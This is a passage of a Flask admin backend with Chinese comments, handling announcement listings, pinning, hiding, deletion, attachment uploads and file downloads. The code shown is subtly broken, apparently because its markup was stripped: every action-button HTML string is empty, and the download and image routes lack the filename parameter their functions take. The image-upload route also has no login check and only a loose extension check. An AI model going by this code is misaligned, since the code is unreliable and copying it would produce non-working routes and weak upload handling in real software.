取得當前datatables透過Ajax回傳的資料取用的開始位置,用來做取查詢結果取出資料位置起始值\n # Datatables 回傳的start參數起始值是從0開始\n get_startDataPosition = request.form.get('start')\n\n # print(\"[get_news_datatable]: get_datatables_verifyCounter: {}\".format(get_datatables_verifyCounter))\n # print(\"[get_news_datatable]: get_showDataLength: {}\".format(get_showDataLength))\n # print(\"[get_news_datatable]: get_startDataPosition: {}\".format(get_startDataPosition))\n\n json_result = jsonify(dict())\n\n # 判斷查詢的公告類別是否為查詢全部公告\n if get_web_arg_Class == \"ALL\":\n\n # 查詢所有的公告內容\n # 透過order_by()來進行排序,預設是asc()升級排序,這裡使用降級排序desc()\n # 透過offset()來指定取得第幾筆位置開始的資料\n # 透過limit()來指定要取幾筆資料出來\n select_news_all = News.query.filter_by(DPID = get_web_arg_DPID,hide_status = False).order_by(News.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()\n\n # 查詢所有的公告內容總筆數\n select_News_count = News.query.filter_by(DPID=get_web_arg_DPID,hide_status = False).count()\n\n else:\n\n # 查詢指定類別公告內容\n # 透過order_by()來進行排序,預設是asc()升級排序,這裡使用降級排序desc()\n # 透過offset()來指定取得第幾筆位置開始的資料\n # 透過limit()來指定要取幾筆資料出來\n select_news_all = News.query.filter_by(DPID = get_web_arg_DPID , Class = get_web_arg_Class,hide_status = False).order_by(News.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()\n\n # 查詢所有的公告內容總筆數\n select_News_count = News.query.filter_by(DPID = get_web_arg_DPID, Class = get_web_arg_Class,hide_status = False).count()\n\n data_list = list()\n\n # 讀取查詢結果資料清單\n for read_item in select_news_all:\n \n data = dict()\n\n data['NID'] = read_item.get_NID()\n data['Class'] = read_item.get_Class()\n data['Title'] = read_item.get_title()\n data['Createdate'] = str(read_item.get_Createdate()) \n\n # 判斷公告的隱藏狀態,如果是false代表公告不隱藏,如果是true代表公告隱藏\n if not read_item.get_hide_status():\n\n # data['hide_status'] = \"\"\n\n # 隱藏公告內容 按鈕\n hidestatus_news_button = \"\"\n\n # else:\n\n # data['hide_status'] = \"\"\n\n # # 顯示公告內容 按鈕\n # hidestatus_news_button = \"\"\n\n \n # 判斷公告是否置頂\n if read_item.get_Top():\n \n data['Top'] = \"\"\n \n # 移除公告置頂 按鈕\n change_Top_button = \"\"\n \n else:\n\n data['Top'] = \"未置頂\"\n\n # 設為公告置頂 按鈕\n change_Top_button = \"\"\n \n # 附件檔案管理 按鈕\n newsfilelist_button = \"\"\n \n # # 判斷公告的隱藏狀態,如果是false代表公告不隱藏,如果是true代表公告隱藏\n # if not read_item.get_hide_status():\n\n # data['hide_status'] = \"\"\n\n # # 隱藏公告內容 按鈕\n # hidestatus_news_button = \"\"\n\n # else:\n\n # data['hide_status'] = \"\"\n\n # # 顯示公告內容 按鈕\n # hidestatus_news_button = \"\"\n\n \n # delete_news_button = \"\"\n\n # 處理動作 按鈕\n data['action'] = edit_news_button + newsfilelist_button + change_Top_button + hidestatus_news_button\n\n data_list.append(data)\n\n # print(data_list)\n\n # 產生Json資料回傳給前端Datatables\n json_result = jsonify(dict(\n # 回傳驗證計數\n draw=get_datatables_verifyCounter,\n # 回傳資料總筆數\n recordsTotal=select_News_count,\n # 回傳資料總筆數,用在搜尋過濾上\n recordsFiltered=select_News_count,\n # 回傳查詢的資料結果\n data = data_list\n ))\n\n # print(\"[get_news_datatable]: json_result: {}\".format(json_result))\n\n return json_result\n \n\n@app.route('/get_news_storage_datatable', methods=['GET', 'POST'])\n@login_required\ndef get_news_storage_datatable(): # 公告資訊儲存狀態Datatables呼叫請求資料\n\n # 驗證登入狀態是否異常\n verify_login_status()\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n\n # 取得網頁URL位址參數\n get_web_arg_DPID = request.args.get('DPID')\n get_web_arg_Class = request.args.get('Class')\n\n # print(\"[get_news_storage_datatable]: get_web_arg_DPID: {}\".format(get_web_arg_DPID))\n # print(\"[get_news_storage_datatable]: get_web_arg_Class: {}\".format(get_web_arg_Class)) \n\n # Datatables Server-side processing\n # https://datatables.net/manual/server-side#Returned-data\n # 取得當前datatables透過Ajax回傳的計數,用來做後端回傳資料驗證\n get_datatables_verifyCounter = request.form.get('draw')\n # 取得當前datatables透過Ajax回傳的頁面顯示筆數,用來做取查詢結果取出資料筆數\n get_showDataLength = request.form.get('length')\n # 取得當前datatables透過Ajax回傳的資料取用的開始位置,用來做取查詢結果取出資料位置起始值\n # Datatables 回傳的start參數起始值是從0開始\n get_startDataPosition = request.form.get('start')\n\n # print(\"[get_news_storage_datatable]: get_datatables_verifyCounter: {}\".format(get_datatables_verifyCounter))\n # print(\"[get_news_storage_datatable]: get_showDataLength: {}\".format(get_showDataLength))\n # print(\"[get_news_storage_datatable]: get_startDataPosition: {}\".format(get_startDataPosition))\n\n json_result = jsonify(dict())\n\n # 判斷查詢的公告類別是否為查詢全部公告\n if get_web_arg_Class == \"ALL\":\n\n # 查詢所有的公告內容\n # 透過order_by()來進行排序,預設是asc()升級排序,這裡使用降級排序desc()\n # 透過offset()來指定取得第幾筆位置開始的資料\n # 透過limit()來指定要取幾筆資料出來\n select_news_all = News.query.filter_by(DPID = get_web_arg_DPID , hide_status = True).order_by(News.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()\n\n # 查詢所有的公告內容總筆數\n select_News_count = News.query.filter_by(DPID=get_web_arg_DPID , hide_status = True).count()\n\n else:\n\n # 查詢指定類別公告內容\n # 透過order_by()來進行排序,預設是asc()升級排序,這裡使用降級排序desc()\n # 透過offset()來指定取得第幾筆位置開始的資料\n # 透過limit()來指定要取幾筆資料出來\n select_news_all = News.query.filter_by(DPID = get_web_arg_DPID , Class = get_web_arg_Class , hide_status = True).order_by(News.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()\n\n # 查詢所有的公告內容總筆數\n select_News_count = News.query.filter_by(DPID = get_web_arg_DPID, Class = get_web_arg_Class, hide_status = True).count()\n\n data_list = list()\n\n # 讀取查詢結果資料清單\n for read_item in select_news_all:\n \n data = dict()\n\n data['NID'] = read_item.get_NID()\n data['Class'] = read_item.get_Class()\n data['Title'] = read_item.get_title()\n data['Createdate'] = str(read_item.get_Createdate()) \n\n # 判斷公告的隱藏狀態,如果是false代表公告不隱藏,如果是true代表公告隱藏\n if read_item.get_hide_status():\n\n # 還原公告內容 按鈕\n hidestatus_news_button = \"\"\n\n # 移除公告 按鈕\n delete_news_button = \"\"\n\n # 處理動作 按鈕\n data['action'] = hidestatus_news_button + delete_news_button\n\n data_list.append(data)\n\n # print(data_list)\n\n # 產生Json資料回傳給前端Datatables\n json_result = jsonify(dict(\n # 回傳驗證計數\n draw=get_datatables_verifyCounter,\n # 回傳資料總筆數\n recordsTotal=select_News_count,\n # 回傳資料總筆數,用在搜尋過濾上\n recordsFiltered=select_News_count,\n # 回傳查詢的資料結果\n data = data_list\n ))\n\n return json_result\n\n\n@app.route('/get_filedownload_datatable', methods=['GET', 'POST'])\n@login_required\ndef get_filedownload_datatable(): # 檔案附件Datatables呼叫請求資料\n\n # 驗證登入狀態是否異常\n verify_login_status()\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n\n # 取得網頁URL位址參數\n get_web_arg_DPID = request.args.get('DPID')\n\n select_DP_result = DP.query.filter_by(DPID=get_web_arg_DPID).first()\n\n # print(\"[get_filedownload_datatable]: get_web_arg_DPID: {}\".format(get_web_arg_DPID))\n\n # Datatables Server-side processing\n # https://datatables.net/manual/server-side#Returned-data\n # 取得當前datatables透過Ajax回傳的計數,用來做後端回傳資料驗證\n get_datatables_verifyCounter = request.form.get('draw')\n # 取得當前datatables透過Ajax回傳的頁面顯示筆數,用來做取查詢結果取出資料筆數\n get_showDataLength = request.form.get('length')\n # 取得當前datatables透過Ajax回傳的資料取用的開始位置,用來做取查詢結果取出資料位置起始值\n # Datatables 回傳的start參數起始值是從0開始\n get_startDataPosition = request.form.get('start')\n\n # print(\"[get_filedownload_datatable]: get_datatables_verifyCounter: {}\".format(get_datatables_verifyCounter))\n # print(\"[get_filedownload_datatable]: get_showDataLength: {}\".format(get_showDataLength))\n # print(\"[get_filedownload_datatable]: get_startDataPosition: {}\".format(get_startDataPosition))\n\n json_result = jsonify(dict())\n\n # 查詢所有的檔案附件\n # 透過order_by()來進行排序,預設是asc()升級排序,這裡使用降級排序desc()\n # 透過offset()來指定取得第幾筆位置開始的資料\n # 透過limit()來指定要取幾筆資料出來\n select_FileDownload_all = FileDownLoad.query.filter_by(DPID = get_web_arg_DPID).order_by(FileDownLoad.Createdate.desc()).offset(get_startDataPosition).limit(get_showDataLength).all()\n\n # 查詢所有的檔案附件總筆數\n select_FileDownload_count = FileDownLoad.query.filter_by(DPID=get_web_arg_DPID).count()\n\n data_list = list()\n \n # 讀取查詢結果資料清單\n for read_item in select_FileDownload_all:\n \n data = dict()\n\n data['FID'] = read_item.get_FID()\n data['title'] = read_item.get_title()\n data['Createdate'] = str(read_item.get_Createdate())\n\n '''修改檔案附件 按鈕'''\n edit_button = \"\"\n \n '''刪除師資內容 按鈕'''\n delete_button = \"\"\n\n download_button = \"下載檔案附件\"\n\n '''處理動作 按鈕'''\n # data['action'] = edit_button + manage_img_button + delete_button\n data['action'] = edit_button + download_button + delete_button\n\n data_list.append(data)\n\n # print(data_list)\n\n '''產生Json資料回傳給前端Datatables'''\n json_result = jsonify(dict(\n # 回傳驗證計數\n draw = get_datatables_verifyCounter,\n # 回傳資料總筆數\n recordsTotal = select_FileDownload_count,\n # 回傳資料總筆數,用在搜尋過濾上\n recordsFiltered = select_FileDownload_count,\n # 回傳查詢的資料結果\n data = data_list\n ))\n\n # print(\"[get_filedownload_datatable]: json_result: {}\".format(json_result))\n\n return json_result\n\n\n@app.route('/download/')\ndef download_files(filename): # 瀏覽後端下載指定檔案\n\n path = app.config['DOWNLOAD_FILEFOLDER']\n # gen_download_path = send_from_directory(path, filename)\n\n print(\"[download_files]: Start Download {} : {}\".format(filename,send_from_directory(path, filename)))\n\n # 回傳指定的檔案實體下載\n return send_from_directory(path, filename.encode('utf-8').decode('utf-8'),as_attachment=True)\n\n\n@app.route('/ckuploadimg/')\ndef uploaded_files(filename): # 產生上傳指定的圖片路徑\n \n path = app.config['CKEDITOR_UPLOADED_PATH']\n gen_path = send_from_directory(path, filename.encode('utf-8').decode('utf-8'))\n\n # print(\"gen_path: {}\".format(gen_path))\n\n return gen_path\n\n\n@app.route(\"/ckupload\", methods=['GET', 'POST'])\ndef ckupload(): # Ckeditor 上傳圖片功能\n \n file = request.files['upload'] # Ckeditor image upload img file\n print(\"File: {}\".format(file))\n\n extension = file.filename.split('.') # 切割檔案名稱與類型\n print(\"Extension: {}\".format(extension))\n\n filetype = extension[1].lower() # 取得檔案類型\n print(\"File Type: {}\".format(filetype))\n\n if filetype not in ALLOWED_IMAGE_EXTENSIONS: # 驗證圖片類型\n\n print(\"{} 不支援的圖片類型\".format(file.filename))\n return upload_fail(message='[{}] 不支援的圖片類型,圖片類型要求\"jpg\"、\"png\"!'.format(file.filename)) # 返回upload_fail调用\n\n # 重新命名檔名\n re_filename = \"f\" + str(dtime.datetime.now().strftime(time_format_ckupload_img))\n\n print(\"Re_filename: {}\".format(re_filename))\n \n # 儲存圖片本體至app.config['CKEDITOR_UPLOADED_PATH']所設定的位址\n file.save(os.path.join(app.config['CKEDITOR_UPLOADED_PATH'], re_filename))\n\n # 呼叫uploaded_files方法取得圖片Path,但前端顯示的資訊不會是圖片Path,而是uploaded_files所對應的app.route()內所設置的URL\n url = url_for(\"uploaded_files\", filename=re_filename)\n\n print(\"Image URL: {}\".format(url))\n\n return upload_success(url=url) \n\n# ------------------------------------------- 網站頁面 -------------------------------------------\n@app.route(\"/helloworld\")\ndef helloworld(): # 秀出helloworld訊息頁面\n\n return \"helloworld\"\n\n\n@app.route(\"/admin\", methods=['GET', 'POST'])\n@login_required\ndef admin(): # 後台系統首頁\n\n # 驗證登入狀態是否異常\n verify_login_status()\n\n # 初始化URL\n list_URL = initialize_URL()\n\n\n Http_Title = \"後台管理系統\"\n\n # 查詢 使用者帳戶(User) 資料庫,目前登入的使用者資訊\n result = User_Admin.query.filter_by(\n UID=session['UID'], UserName=session['UserName']).first()\n\n\n return render_template('index.html', Http_Title=Http_Title,\n UID=session['UID'],UserName=session['UserName'],\n dp = session['DP'],\n list_URL=list_URL)\n\n\n\n# ------------------------------------------- 後台公告管理 -------------------------------------------\n@app.route(\"/news\", methods=['GET', 'POST'])\n@login_required\ndef news(): # 公告資訊頁面\n\n # 驗證登入狀態是否異常\n verify_login_status()\n\n # 驗證網站目前是否有開放\n is_Unable = check_unable_page(\"news\")\n\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n # 初始化URL List\n list_URL = initialize_URL()\n \n Http_Title = \"後台公告資訊列表\"\n\n # 取得網頁參數\n get_web_arg_dplistClass = request.args.get('dplistClass')\n\n # print(\"[admin_news]: get_web_arg_dplistClass: {}\".format(get_web_arg_dplistClass))\n\n # ------------------------------------- ajax傳遞參數處理 ---------------------------------------------------\n if request.method == 'POST':\n\n # 獲取json數據\n data = request.get_json(force=True)\n\n # 取得AJAX回傳數據-目錄名稱為'action'內參數\n get_js_action = data['action']\n\n if get_js_action == \"startTop\": # 開始置頂\n\n Top_change_staus = False\n top_err_log = \"\"\n \n # 取得AJAX回傳數據-目錄名稱為'NID'內參數\n get_js_NID = data['NID']\n # 取得AJAX回傳數據-目錄名稱為'top'內參數\n get_js_top = data['top']\n\n # 取得AJAX回傳數據-目錄名稱為'dplistClass'內參數\n get_js_dplistClass = data['dplistClass']\n \n # 查詢公告消息資料\n get_News = News.query.filter_by(NID=int(get_js_NID)).first()\n\n if get_News.get_NID() != None:\n\n get_News.Top = get_js_top\n\n db.session.commit()\n\n select_News = News.query.filter_by(NID=int(get_js_NID), Top=get_js_top).count()\n print(\"select_News: {} {}\".format(select_News,News.query.filter_by(NID=int(get_js_NID)).first().get_Top()))\n\n if select_News != 0:\n\n Top_change_staus = True\n top_err_log = \"公告置頂成功.\"\n\n else:\n\n Top_change_staus = False\n top_err_log = \"公告置頂失敗.\"\n\n return jsonify(dict(redirect=url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), Top_change_staus=Top_change_staus, top_err_log=top_err_log))\n\n if get_js_action == \"stopTop\": # 移除置頂\n\n Top_change_staus = False\n top_err_log = \"\"\n\n get_js_NID = data['NID']\n get_js_top = data['top']\n get_js_dplistClass = data['dplistClass']\n \n get_News = News.query.filter_by(NID=int(get_js_NID)).first()\n\n if get_News.get_NID() != None:\n get_News.Top = get_js_top\n db.session.commit()\n\n select_News = News.query.filter_by(NID=int(get_js_NID), Top=get_js_top).count()\n\n if select_News != 0:\n Top_change_staus = True\n top_err_log = \"公告已移除置頂.\"\n else:\n Top_change_staus = False\n top_err_log = \"公告移除置頂失敗.\"\n\n return jsonify(dict(redirect = url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), Top_change_staus = Top_change_staus,top_err_log=top_err_log)) \n\n \n if get_js_action == \"hidenews\": # 隱藏公告\n \n hide_change_staus = False\n hide_err_log = \"None\"\n\n # 取得Ajax傳遞過來參數\n get_js_NID = data['NID']\n get_js_dplistClass = data['dplistClass'] \n\n # 取得指定的公告主體\n get_News = News.query.filter_by(NID=int(get_js_NID)).first()\n\n # print(\"[admin_new]: 隱藏公告 NID: {} , title: {} , {}\".format(get_js_NID,get_News.get_title(),get_current_datetime()))\n \n # 判斷是否取得的公告編號是否不為Nonetype\n if get_News.get_NID() != None:\n \n try:\n\n # 更改公告的遮蔽狀態參數\n get_News.hide_status = True # 如果是True代表公告隱藏\n\n # 寫入資料庫\n db.session.commit()\n\n hide_change_staus = True\n\n hide_err_log = \"公告隱藏成功.\"\n\n except exc.SQLAlchemyError as SQLError:\n \n # 回復寫入資料庫之前狀態\n db.session.rollback()\n\n print(\"[admin_new]: hide news SQLError: {}\".format(SQLError._message))\n \n hide_change_staus = False\n hide_err_log = \"公告隱藏失敗.\"\n\n return jsonify(dict(redirect = url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), hide_change_staus = hide_change_staus,hide_err_log=hide_err_log))\n\n return jsonify(dict(redirect = url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), hide_change_staus = hide_change_staus,hide_err_log=hide_err_log))\n\n\n if get_js_action == \"shownews\": # 顯示公告\n \n show_change_staus = False\n show_err_log = \"None\"\n\n # 取得Ajax傳遞過來參數\n get_js_NID = data['NID']\n get_js_dplistClass = data['dplistClass'] \n\n # 取得指定的公告主體\n get_News = News.query.filter_by(NID=int(get_js_NID)).first()\n\n # print(\"[admin_new]: 顯示公告 NID: {} , title: {} , {}\".format(get_News.get_NID(),get_News.get_title(),get_current_datetime()))\n\n # 判斷是否取得的公告編號是否不為Nonetype\n if get_News.get_NID() != None: \n\n print(\"{}\".format(get_News.get_hide_status()))\n\n try:\n\n # 更改公告的遮蔽狀態參數\n get_News.hide_status = False # 如果是false代表公告不隱藏 \n\n # 寫入資料庫\n db.session.commit() \n\n show_change_staus = True\n\n show_err_log = \"公告顯示成功.\"\n\n except exc.SQLAlchemyError as SQLError:\n \n # 回復寫入資料庫之前狀態\n db.session.rollback()\n\n # print(\"[admin_new]: show news SQLError: {}\".format(SQLError._message))\n \n show_change_staus = False\n\n show_err_log = \"公告顯示失敗.\"\n\n return jsonify(dict(redirect = url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), show_change_staus = show_change_staus,show_err_log=show_err_log))\n\n\n return jsonify(dict(redirect = url_for('news',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), show_change_staus = show_change_staus,show_err_log=show_err_log))\n\n\n return render_template('news.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'],\n DPID=session['DPID'],\n is_Unable=is_Unable,\n list_news_class=list_news_class,\n dplistClass=get_web_arg_dplistClass,\n list_URL=list_URL)\n\n\n@app.route(\"/news_storagemanage\", methods=['GET', 'POST'])\n@login_required\ndef news_storagemanage(): # 公告資訊儲存狀態頁面\n \n # 驗證登入狀態是否異常\n verify_login_status()\n\n # 驗證網站目前是否有開放\n is_Unable = check_unable_page(\"news_storagemanage\")\n\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n # 初始化URL List\n list_URL = initialize_URL()\n \n Http_Title = \"後台公告儲存狀態\"\n\n # 取得網頁參數\n get_web_arg_dplistClass = request.args.get('dplistClass')\n\n # print(\"[admin_news_storagemanage]: get_web_arg_dplistClass: {}\".format(get_web_arg_dplistClass))\n\n if request.method == 'POST':\n\n # 獲取json數據\n data = request.get_json(force=True)\n\n get_js_action = data['action']\n\n if get_js_action == \"deletenews\": # 移除公告\n\n delete_change_staus = False\n delete_err_log = \"None\"\n\n # 取得Ajax傳遞過來參數\n get_js_NID = data['NID']\n get_js_dplistClass = data['dplistClass']\n\n # 取得指定的公告主體\n get_News = News.query.filter_by(NID=int(get_js_NID),hide_status = True).first()\n\n # print(\"[admin_news_storagemanage]: 移除公告 NID: {} , title: {} , {}\".format(get_News.get_NID(),get_News.get_title(),get_current_datetime()))\n \n # 判斷是否取得的公告編號是否不為Nonetype\n if get_News.get_NID() != None:\n \n # 取得公告附件數量\n check_Newsfile = NewsFile.query.filter_by(NID=get_News.get_NID()).count()\n\n list_file_path = list()\n \n try:\n\n # 判斷公告數量是否不為0,代表有附件\n if check_Newsfile != 0:\n\n # 取得公告附件資訊\n select_newsfile_result = NewsFile.query.filter_by(NID=get_News.get_NID()) \n \n # 讀取公告附件清單\n for read_item in select_newsfile_result:\n\n print(\"news file: {} , path: {}\".format(read_item.get_File(), read_item.get_FilePosition()))\n\n file_path = os.path.join(currentPath,app.config['UPLOAD_FILEFOLDER'],read_item.get_FilePosition())\n \n # 判斷檔案是否存在\n if os.path.exists(file_path):\n\n # print(\"[ {} ] 檔案存在.\".format(file_path))\n\n os.remove(file_path) # 移除檔案\n\n # 刪除公告附件紀錄\n db.session.delete(read_item)\n \n # 移除公告\n db.session.delete(get_News)\n \n # 寫入資料庫\n db.session.commit()\n\n delete_change_staus = True\n\n delete_err_log = \"公告移除成功.\"\n\n except exc.SQLAlchemyError as SQLError:\n \n # 回復寫入資料庫之前狀態\n db.session.rollback()\n\n print(\"[admin_news_storagemanage]: hide news SQLError: {}\".format(SQLError._message))\n \n delete_change_staus = False\n delete_err_log = \"公告移除失敗.\"\n\n return jsonify(dict(redirect = url_for('news_storagemanage',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), delete_change_staus = delete_change_staus,delete_err_log=delete_err_log))\n\n return jsonify(dict(redirect = url_for('news_storagemanage',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), delete_change_staus = delete_change_staus,delete_err_log=delete_err_log))\n\n\n if get_js_action == \"shownews\": # 還原公告\n \n show_change_staus = False\n show_err_log = \"None\"\n\n # 取得Ajax傳遞過來參數\n get_js_NID = data['NID']\n get_js_dplistClass = data['dplistClass'] \n\n # 取得指定的公告主體\n get_News = News.query.filter_by(NID=int(get_js_NID)).first()\n\n # print(\"[admin_news_storagemanage]: 還原公告 NID: {} , title: {} , {}\".format(get_News.get_NID(),get_News.get_title(),get_current_datetime()))\n\n # 判斷是否取得的公告編號是否不為Nonetype\n if get_News.get_NID() != None: \n\n print(\"{}\".format(get_News.get_hide_status()))\n\n try:\n\n # 更改公告的遮蔽狀態參數\n get_News.hide_status = False # 如果是false代表公告不隱藏 \n\n # 寫入資料庫\n db.session.commit() \n\n show_change_staus = True\n\n show_err_log = \"公告還原成功.\"\n\n except exc.SQLAlchemyError as SQLError:\n \n # 回復寫入資料庫之前狀態\n db.session.rollback()\n\n print(\"[admin_news_storagemanage]: show news SQLError: {}\".format(SQLError._message))\n \n show_change_staus = False\n\n show_err_log = \"公告還原失敗.\"\n\n return jsonify(dict(redirect = url_for('news_storagemanage',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), show_change_staus = show_change_staus,show_err_log=show_err_log))\n\n return jsonify(dict(redirect = url_for('news_storagemanage',UID=session['UID'],DPID=session['DPID'], UserName=session['UserName'],dplistClass=get_js_dplistClass), show_change_staus = show_change_staus,show_err_log=show_err_log))\n\n\n return render_template('news_storagemanage.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'],\n DPID = session['DPID'],\n is_Unable=is_Unable,\n list_news_storagemanage_class = list_news_storagemanage_class,\n dplistClass = get_web_arg_dplistClass, \n list_URL = list_URL)\n\n\n@app.route(\"/newsfilelist\", methods=['GET', 'POST'])\n@login_required\ndef newsfilelist(): # 公告附件管理頁面\n\n # 驗證登入狀態是否異常\n verify_login_status()\n\n # 驗證網站目前是否有開放\n is_Unable = check_unable_page(\"newsfilelist\")\n\n # ------------------------------------- 網頁初始化參數 ----------------------------------------------------\n # 初始化URL List\n list_URL = initialize_URL()\n\n Http_Title = \"後台公告附件管理\"\n\n '''查詢部門資料表實體'''\n select_DP = DP.query.filter_by(DPID = session['DPID']).first()\n\n # 取得網頁URL位址參數\n get_web_arg_news_NID = request.args.get('NID')\n get_web_arg_news_Class = request.args.get('Class')\n get_web_arg_news_Title = request.args.get('Title')\n get_web_arg_dplistClass = request.args.get('dplistClass')\n\n # print(\"[admin_newsfilelist]: get_web_arg_news_NID: {}\".format(get_web_arg_news_NID))\n # print(\"[admin_newsfilelist]: get_web_arg_news_Title: {}\".format(get_web_arg_news_Title))\n print(\"[admin_newsfilelist]: get_web_arg_dplistClass: {}\".format(get_web_arg_dplistClass))\n\n\n # ------------------------------------- ajax傳遞參數處理 ---------------------------------------------------\n if request.method == 'POST':\n\n # 獲取json數據\n data = request.get_json(force = True,silent = True)\n\n # print(\"data: {}\".format(data))\n\n if data != None and data['action'] == 'deleteNewsfile': # 刪除指定的附件檔案\n\n delete_change_staus = False\n delete_err_log = \"\"\n \n get_js_NID = data['NID'] # 取得公告編號\n get_js_Title = data['Title'] # 取得公告主題\n get_js_NFID = data['NFID'] # 取得附件檔案編號\n get_js_File = data['File'] # 取得附件檔案名稱\n \n # 判斷指定的附件檔案是否有在資料庫中紀錄存在\n if NewsFile.query.filter_by(NFID=int(get_js_NFID), File = get_js_File).count() != 0:\n \n # 取得附件檔案資料庫實體\n get_newsfile = NewsFile.query.filter_by(NFID = int(get_js_NFID), File = get_js_File).first()\n \n # 產生附件檔案實體位置\n gen_newsfile_path = os.path.join(currentPath,app.config['DOWNLOAD_FILEFOLDER'], get_newsfile.get_FilePosition())\n\n # 判斷附件檔案實體存在狀態\n if os.path.exists(gen_newsfile_path):\n \n # 移除附件檔案實體\n os.remove(gen_newsfile_path)\n\n # 判斷附件檔案實體是否已被移除\n if not os.path.exists(gen_newsfile_path):\n\n # 刪除附件檔案紀錄\n db.session.delete(get_newsfile)\n\n # 更新資料庫\n db.session.commit()\n\n # 判斷是否已將附件檔案紀錄移除\n if NewsFile.query.filter_by(NFID = int(get_js_NFID), File = get_js_File).count() == 0:\n # print(\"[admin_newsfilelist]: delete_change_staus: {}\".format(delete_change_staus))\n delete_change_staus = True\n\n else:\n\n delete_change_staus = False\n delete_err_log = \"附件檔案不存在.\"\n\n else:\n\n delete_change_staus = False\n delete_err_log = \"附件檔案紀錄不存在.\"\n\n return jsonify(dict(redirect = url_for('newsfilelist', UID=session['UID'], UserName=session['UserName'],NID = get_js_NID,Class = get_web_arg_news_Class, Title = get_js_Title,dplistClass=get_web_arg_dplistClass), delete_change_staus = delete_change_staus,delete_err_log = delete_err_log))\n \n elif data == None:\n\n update_change_staus = True\n err_log = \"\"\n\n # 取得前端form input file list\n form_files = request.files.getlist(\"files[]\") # 新增附件\n\n print(\"[admin_newsfilelist]: select file quantity: {}\".format(len(form_files)))\n \n # 判斷是否有附加檔案\n if len(form_files) != 0:\n\n print(\"[admin_newsfilelist]: form_files length: {}\".format(len(form_files)))\n\n # 上傳檔案的跟目錄位置\n img_save_dir = os.path.join(app.config['UPLOAD_FILEFOLDER'], get_web_arg_news_Class)\n\n is_repeat_filename = False \n\n # 讀取檔案清單\n for read_file in form_files:\n\n print(\"[admin_newsfilelist] 檔案:{}\".format(read_file.filename))\n\n # 針對secure_filename() 中文檔名問題\n # http://www.voidcn.com/article/p-cxjdqemb-bpc.html\n # 檢查檔案名稱\n filename = secure_filename(read_file.filename.encode('utf-8').decode('utf-8'))\n\n # 取得附件檔案資料庫實體\n check_newsfile_exist = NewsFile.query.filter_by(NID = get_web_arg_news_NID ,File = filename).count()\n\n print(\"[admin_newsfilelist] 檢查{}是否有重複,查詢筆數:{}\".format(filename,check_newsfile_exist))\n\n if check_newsfile_exist != 0:\n\n is_repeat_filename = True\n\n update_change_staus = False\n err_log = \"[系統警告]發現附件檔案重複上傳\\n檔案名稱:{}\\n本次操作系統不予新增檔案,請在重新確認所選擇附件檔案。\".format(filename)\n\n print(\"[admin_newsfilelist] 部門編號: {} , 部門: {} 附件檔案重複上傳[{}],不予執行新增程序\".format(\n select_DP.get_DPID(),\n select_DP.get_DP(),\n filename\n ))\n\n break\n\n ''' 如果在檢查重複檔案名稱都沒問題,is_repeat_filename 會是False '''\n if not is_repeat_filename:\n\n print(\"[admin_newsfilelist]執行新增圖片程序\")\n\n # 檢查目錄是否存在 \n if not os.path.isdir(img_save_dir):\n\n try:\n \n os.makedirs(img_save_dir)\n\n except FileExistsError: # 檔案已存在的例外處理\n\n print(\"[admin_newsfilelist]: [ {} ]目錄已存在。\".format(img_save_dir))\n\n\n # 檢查目錄內是否有對應的部門簡稱目錄\n if not os.path.isdir(os.path.join(img_save_dir, select_DP.get_DP())):\n\n try:\n \n os.makedirs(os.path.join(img_save_dir, select_DP.get_DP()))\n\n except FileExistsError: # 檔案已存在的例外處理\n\n print(\"[admin_newsfilelist]: [ {} ]目錄已存在。\".format(os.path.join(img_save_dir, select_DP.get_DP())))\n\n\n # 讀取檔案清單\n for read_file in form_files:\n\n print(\"[admin_newsfilelist]: FileName: {}\".format(read_file.filename)) \n\n # 針對secure_filename() 中文檔名問題\n # http://www.voidcn.com/article/p-cxjdqemb-bpc.html\n # 檢查檔案名稱\n filename = secure_filename(read_file.filename.encode('utf-8').decode('utf-8'))\n \n file_path = os.path.join(img_save_dir , select_DP.get_DP() , filename) # 配置檔案詳細路徑\n \n print(\"[ {} ]檔案存放路徑: {}\".format(filename,file_path))\n \n read_file.save(file_path) # 存檔上傳\n \n # 新增公告附件紀錄\n db.session.add(NewsFile(NID=int(get_web_arg_news_NID), File=filename, FilePosition=os.path.join(get_web_arg_news_Class, select_DP.get_DP(),filename)))\n \n # 更新資料庫\n db.session.commit()\n\n update_change_staus = True\n\n return jsonify(dict(redirect = url_for('newsfilelist', UID=session['UID'], UserName=session['UserName'],NID = get_web_arg_news_NID,Class = get_web_arg_news_Class, Title = get_web_arg_news_Title,dplistClass=get_web_arg_dplistClass),update_change_staus = update_change_staus, err_log = err_log))\n\n else:\n\n print(\"[admin_newsfilelist]不予執行新增圖片程序\")\n\n return jsonify(dict(redirect = url_for('newsfilelist', UID=session['UID'], UserName=session['UserName'],NID = get_web_arg_news_NID,Class = get_web_arg_news_Class, Title = get_web_arg_news_Title,dplistClass=get_web_arg_dplistClass),update_change_staus = update_change_staus, err_log = err_log))\n\n # ------------------------------------- 網頁內容初始化 ----------------------------------------------------\n select_NewsFile_result = NewsFile.query.filter_by(NID = int(get_web_arg_news_NID))\n\n list_NewsFile_all = 